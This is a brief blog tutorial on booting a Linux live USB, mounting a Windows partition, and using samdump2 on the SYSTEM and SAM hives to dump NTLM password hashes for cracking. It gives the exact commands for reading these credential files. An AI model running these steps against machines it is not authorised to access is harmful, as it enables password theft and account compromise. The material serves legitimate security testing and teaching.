Post

Extract NTLM Hashes via Linux Live Boot

Posted Updated
By Alexander Wells
1 min read

Using a live boot of Linux, we can extract the NTLM hashes of the windows accounts on a computer and attempt to crack to find out the passwords.

  1. Prerequisites
  2. Mount Drive
  3. Dump Hashes

Prerequisites

  • Physical access to a Windows Machine without BitLocker
  • Bootable Linux USB (ideally Kali)


Mount Drive

Create a new directory where the drive will be mounted:

1

mkdir FOLDER_NAME

List Block Devices:

1

lsblk

Mount the primary windows partition (it should be the largest one there):

1

mount /dev/PARTITION_NAME FOLDER_NAME
  • FOLDER_NAME is the folder created above


Dump Hashes

Navigate to Windows/System32/config in the mounted drive and run:

1

samdump2 SYSTEM SAM
  • Hashes will be in PWDump format <username>:<uid>:<LM-hash>:<NTLM-hash>:<comment>:<homedir>:
security, windows
security windows sam system kali samdump2 passwords hashes ntlm
This post is licensed under CC BY 4.0 by the author.